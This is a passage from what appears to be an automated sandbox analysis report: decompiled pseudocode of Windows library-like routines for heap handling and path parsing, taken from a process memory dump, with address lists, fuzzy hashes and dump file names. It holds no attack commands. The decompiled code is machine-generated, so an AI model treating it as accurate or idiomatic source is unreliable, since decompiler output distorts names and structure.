														E04D4FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04D4F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04D4F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04DD4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04D5D130(_t427, _t494, _t511);
				}
			}

0x04dd5ba5
0x04dd5baa
0x04dd5baf
0x04dd5bb4
0x04dd5bb6
0x04dd5bbc
0x04dd5bbe
0x04dd5bc4
0x04dd5bcd
0x04dd5bd3
0x04dd5bd6
0x04dd5bdc
0x04dd5be0
0x04dd5be3
0x04dd5beb
0x04dd5bf2
0x04dd5bf8
0x04dd5bfe
0x04dd5c04
0x04dd5c0e
0x04dd5c18
0x04dd5c1f
0x04dd5c25
0x04dd5c2a
0x04dd5c2c
0x04dd5c32
0x04dd5c3a
0x04dd5c3f
0x04dd5c42
0x04dd5c48
0x04dd5c5b
0x04dd5c5b
0x04dd5c2c
0x04dd5cb7
0x04dd5cb9
0x04dd5cbf
0x04dd5cc2
0x04dd5cca
0x04dd5ccb
0x04dd5ccb
0x04dd5cd1
0x04dd5cd7
0x04dd5cda
0x04dd5ce1
0x04dd5ce4
0x04dd5ce7
0x04dd5ced
0x04dd5cf3
0x04dd5cf9
0x04dd5cff
0x04dd5d08
0x04dd5d0a
0x04dd5d0e
0x04dd5d10
0x00000000
0x00000000
0x04dd5d16
0x04dd5d1a
0x00000000
0x00000000
0x04dd5d20
0x04dd5d22
0x04dd5d25
0x04dd5d2f
0x04dd5d2f
0x04dd5d33
0x04dd5d3d
0x04dd5d49
0x04dd5d4b
0x00000000
0x00000000
0x04dd5d5a
0x04dd5d5d
0x04dd5d60
0x00000000
0x00000000
0x04dd5d66
0x04dd5d69
0x00000000
0x00000000
0x04dd5d6f
0x04dd5d6f
0x04dd5d73
0x04dd5d79
0x04dd5d7f
0x04dd5d86
0x04dd5d95
0x04dd5d98
0x04dd5dba
0x04dd5dcb
0x04dd5dce
0x04dd5dd3
0x04dd5dd6
0x04dd5dd8
0x04dd5de6
0x04dd5dec
0x04dd5dee
0x04dd5df1
0x04dd5df3
0x04dd635a
0x04dd635a
0x00000000
0x04dd635a
0x04dd5dfe
0x04dd5e02
0x04dd5e05
0x04dd5e07
0x04dd5e10
0x04dd5e13
0x04dd5e1b
0x04dd5e1c
0x04dd5e21
0x04dd5e22
0x04dd5e23
0x04dd5e25
0x04dd5e2a
0x04dd5e2c
0x04dd5e2e
0x04dd5e36
0x04dd5e39
0x04dd5e42
0x04dd5e47
0x04dd5e4d
0x04dd5e54
0x04dd5e54
0x04dd5e54
0x04dd5e2e
0x04dd5e5c
0x04dd5e5f
0x04dd5e62
0x04dd5e64
0x04dd5e6b
0x04dd5e70
0x04dd5e7a
0x04dd5e7a
0x04dd5e7a
0x04dd5e6b
0x04dd5e7e
0x04dd5e7f
0x04dd5e7f
0x04dd5e81
0x04dd5e87
0x04dd5e8b
0x04dd5e8c
0x04dd5e8c
0x04dd5e8c
0x04dd5e9a
0x04dd5e9c
0x04dd5ea2
0x04dd5ea6
0x04dd5f50
0x04dd5f50
0x04dd5f57
0x04dd5f66
0x04dd5f66
0x04dd5f66
0x04dd5f68
0x04dd5f6a
0x04dd63d0
0x00000000
0x04dd5f70
0x04dd5f70
0x04dd5f91
0x04dd5f9c
0x04dd5f9e
0x04dd5fa4
0x04dd5fa6
0x04dd638c
0x04dd6392
0x04dd63a1
0x04dd63a7
0x04dd63af
0x04dd63af
0x04dd63bd
0x04dd63d8
0x00000000
0x04dd63d8
0x04dd5fac
0x04dd5fb2
0x04dd5fb4
0x04dd5fbd
0x04dd5fc6
0x04dd5fce
0x04dd5fd4
0x04dd5fdc
0x04dd5fec
0x04dd5fed
0x04dd5fee
0x04dd5fef
0x04dd5ff9
0x04dd5ffa
0x04dd5ffb
0x04dd5ffc
0x04dd6000
0x04dd6004
0x04dd6012
0x04dd6012
0x04dd6018
0x04dd6019
0x04dd601a
0x04dd601b
0x04dd601c
0x04dd6020
0x04dd6059
0x04dd605c
0x04dd6061
0x04dd6061
0x04dd6022
0x04dd6022
0x04dd6022
0x04dd6025
0x04dd602a
0x04dd602b
0x04dd6031
0x04dd6037
0x04dd6038
0x04dd603e
0x04dd6048
0x04dd6049
0x04dd604a
0x04dd604b
0x04dd604c
0x04dd604d
0x04dd6053
0x04dd6054
0x04dd6054
0x04dd6062
0x04dd6065
0x04dd6067
0x04dd606a
0x04dd6070
0x04dd6075
0x04dd6076
0x04dd6081
0x04dd6087
0x04dd6095
0x04dd6099
0x04dd609e
0x04dd60a4
0x04dd60ae
0x04dd60b0
0x04dd60b3
0x04dd60b6
0x04dd60b8
0x04dd60ba
0x04dd60ba
0x04dd60ba
0x04dd60ba
0x04dd60be
0x04dd60c0
0x04dd60c5
0x04dd60c5
0x04dd60c5
0x04dd60c6
0x04dd60cd
0x04dd6114
0x04dd60cf
0x04dd60cf
0x04dd60d4
0x04dd60d5
0x04dd60da
0x04dd60db
0x04dd60e1
0x04dd60e2
0x04dd60e8
0x04dd60f8
0x04dd60fd
0x04dd60fe
0x04dd6102
0x04dd6104
0x04dd6107
0x04dd6109
0x04dd610b
0x04dd610b
0x04dd610b
0x04dd610b
0x04dd610f
0x04dd610f
0x04dd6117
0x04dd611a
0x04dd611f
0x04dd6125
0x04dd6134
0x04dd6139
0x04dd613f
0x04dd6146
0x04dd6148
0x04dd614b
0x04dd614d
0x04dd614f
0x04dd614f
0x04dd614f
0x04dd614f
0x04dd6153
0x04dd6159
0x04dd6159
0x04dd615c
0x04dd6163
0x04dd6169
0x04dd616c
0x04dd6172
0x04dd6181
0x04dd6186
0x04dd6187
0x04dd618b
0x04dd6191
0x04dd6195
0x04dd61a3
0x04dd61bb
0x04dd61c0
0x04dd61c3
0x04dd61cc
0x04dd61d0
0x04dd61dc
0x04dd61de
0x04dd61e1
0x04dd61e4
0x04dd61e6
0x04dd61e8
0x04dd61e8
0x04dd61e8
0x04dd61e8
0x04dd61e6
0x04dd61ec
0x04dd61f3
0x04dd6203
0x04dd6209
0x04dd620a
0x04dd6216
0x04dd621d
0x04dd6227
0x04dd6241
0x04dd6246
0x04dd624c
0x04dd6257
0x04dd6259
0x04dd625c
0x04dd625e
0x04dd6260
0x04dd6260
0x04dd6260
0x04dd6260
0x04dd625e
0x04dd6264
0x04dd6267
0x04dd6269
0x04dd6315
0x04dd6315
0x04dd631b
0x04dd631e
0x04dd6324
0x04dd6327
0x04dd632f
0x04dd6330
0x04dd6333
0x04dd633a
0x04dd633c
0x04dd6335
0x04dd6335
0x04dd6335
0x04dd633f
0x04dd6342
0x04dd634c
0x04dd6352
0x04dd6355
0x04dd6355
0x04dd6359
0x00000000
0x04dd626f
0x04dd6275
0x04dd6275
0x04dd6278
0x04dd627e
0x04dd627e
0x04dd6281
0x04dd6287
0x04dd628d
0x04dd6298
0x04dd629c
0x04dd62a2
0x04dd629e
0x04dd629e
0x04dd629e
0x04dd62a7
0x04dd62a7
0x04dd62aa
0x04dd62b0
0x04dd62f0
0x04dd62f0
0x04dd62f2
0x04dd62f8
0x04dd62fd
0x04dd62b2
0x04dd62b2
0x04dd62b2
0x04dd62b5
0x04dd62dd
0x04dd62e2
0x04dd62e5
0x04dd62b7
0x04dd62b8
0x04dd62bb
0x04dd62bd
0x04dd62c0
0x04dd62c4
0x04dd62cd
0x04dd62cd
0x04dd62c0
0x04dd62bb
0x04dd62b5
0x04dd6302
0x04dd6303
0x04dd6305
0x04dd6305
0x04dd6305
0x04dd630c
0x04dd630c
0x00000000
0x04dd627e
0x04dd6269
0x04dd5eac
0x04dd5ebb
0x04dd5ebe
0x04dd5ecb
0x04dd5ecb
0x04dd5ece
0x04dd5ece
0x04dd5ed4
0x04dd5ed7
0x04dd5ed9
0x04dd5edb
0x04dd5edb
0x04dd5ee1
0x04dd5ee1
0x04dd5ee3
0x04dd5f20
0x04dd5f20
0x04dd5ee5
0x04dd5ee5
0x04dd5ee5
0x04dd5ee8
0x04dd5f11
0x04dd5f18
0x04dd5eea
0x04dd5eea
0x04dd5eed
0x04dd5ef2
0x04dd5ef8
0x04dd5efb
0x04dd5f0a
0x04dd5f0a
0x04dd5eed
0x04dd5ee8
0x04dd5f22
0x04dd5f28
0x00000000
0x00000000
0x04dd5f30
0x04dd5f31
0x04dd5f37
0x04dd5f3a
0x04dd5f3d
0x04dd5f44
0x00000000
0x00000000
0x00000000
0x04dd5f46
0x04dd5f48
0x04dd5f4d
0x00000000
0x04dd5f4d
0x04dd5dda
0x04dd5ddf
0x00000000
0x04dd5ddf
0x04dd5dd8
0x04dd5da7
0x04dd5da9
0x04dd5dac
0x04dd5dae
0x00000000
0x04dd5db4
0x04dd5db4
0x00000000
0x04dd5db4
0x04dd5dae
0x04dd5d88
0x04dd5d8d
0x04dd6363
0x04dd6369
0x04dd636a
0x04dd6370
0x04dd6372
0x04dd637a
0x04dd637b
0x04dd637d
0x00000000
0x00000000
0x04dd637f
0x04dd6385
0x00000000
0x04dd6385
0x04dd5d38
0x04dd5d3b
0x00000000
0x00000000
0x00000000
0x04dd5d3b
0x04dd5d27
0x04dd5d29
0x00000000
0x00000000
0x00000000
0x04dd6360
0x00000000
0x04dd6360
0x04dd5c10
0x04dd5c10
0x04dd63da
0x04dd63e5
0x04dd63e5

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92071b0b8688cab0de1eadac7180a5bdb1dedd666e2ee853e696f4d08e3020db
Instruction ID: 2b1f5155066a671b31a99cdd3bc1eb16e4b53d205793864ed2a486277f1e8122
Opcode Fuzzy Hash: 92071b0b8688cab0de1eadac7180a5bdb1dedd666e2ee853e696f4d08e3020db
Instruction Fuzzy Hash: 8F424D75A00229DFDB24CF68C890BA9B7B1FF45304F1481AAD94DEB241E775E985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04D24120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04D24120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4dfd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04D3F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04D26E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04D24620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04D26E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04D245F8))) {
												case 0:
													_v568 = 0x4ce1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4ce11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04D24620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04D4F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04D4F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04D052A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04D1EB70(1, 0x4df79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04D1AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04D495D0();
																			L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E04D4B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04D43D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04D4B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x04d24128
0x04d24135
0x04d2413c
0x04d24141
0x04d24145
0x04d24147
0x04d2414e
0x04d24151
0x04d24159
0x04d2415c
0x04d24160
0x04d24164
0x04d24168
0x04d2416c
0x04d2417f
0x04d24181
0x04d2446a
0x04d2446a
0x04d2418c
0x04d24195
0x04d24199
0x04d24432
0x04d24439
0x04d2443d
0x04d24442
0x04d24447
0x00000000
0x04d2419f
0x04d241a3
0x04d241b1
0x04d241b9
0x04d241bd
0x04d245db
0x04d245db
0x00000000
0x04d241c3
0x04d241c3
0x04d241ce
0x04d241d4
0x04d6e138
0x04d6e13e
0x04d6e169
0x04d6e16d
0x04d6e19e
0x04d6e16f
0x04d6e16f
0x04d6e175
0x04d6e179
0x04d6e18f
0x04d6e193
0x00000000
0x04d6e199
0x00000000
0x04d6e199
0x04d6e193
0x00000000
0x00000000
0x00000000
0x04d241da
0x04d241da
0x04d241df
0x04d241e4
0x04d241ec
0x04d24203
0x04d24207
0x04d6e1fd
0x04d24222
0x04d24226
0x04d6e1f3
0x04d6e1f3
0x04d2422c
0x04d2422c
0x04d24233
0x04d6e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04d24239
0x04d24239
0x04d24239
0x04d24239
0x04d24233
0x04d24226
0x04d241ee
0x04d241ee
0x04d241f4
0x04d24575
0x04d6e1b1
0x04d6e1b1
0x00000000
0x04d2457b
0x04d2457b
0x04d24582
0x04d6e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x04d24588
0x04d24588
0x04d2458c
0x04d6e1c4
0x04d6e1c4
0x00000000
0x04d24592
0x04d24592
0x04d24599
0x04d6e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x04d2459f
0x04d2459f
0x04d245a3
0x04d6e1d7
0x04d6e1e4
0x00000000
0x04d245a9
0x04d245a9
0x04d245b0
0x04d6e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x04d245b6
0x04d245b6
0x04d245b6
0x00000000
0x04d245b6
0x04d245b0
0x04d245a3
0x04d24599
0x04d2458c
0x04d24582
0x00000000
0x00000000
0x00000000
0x00000000
0x04d241f4
0x04d2423e
0x04d24241
0x04d245c0
0x04d245c4
0x00000000
0x04d245ca
0x04d245ca
0x00000000
0x04d6e207
0x04d6e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x04d245d1
0x00000000
0x00000000
0x04d245ca
0x00000000
0x04d24247
0x04d24247
0x04d24247
0x04d24249
0x04d24249
0x04d24249
0x04d24251
0x04d24251
0x04d24257
0x04d2425f
0x04d2426e
0x04d24270
0x04d2427a
0x04d6e219
0x04d6e219
0x04d24280
0x04d24282
0x04d24456
0x04d245ea
0x00000000
0x04d245f0
0x04d6e223
0x00000000
0x04d6e223
0x04d2445c
0x04d2445c
0x00000000
0x04d2445c
0x00000000
0x04d24288
0x04d2428c
0x04d6e298
0x04d24292
0x04d24292
0x04d2429e
0x04d242a3
0x04d242a7
0x04d242ac
0x04d6e22d
0x04d242b2
0x04d242b2
0x04d242b9
0x04d242bc
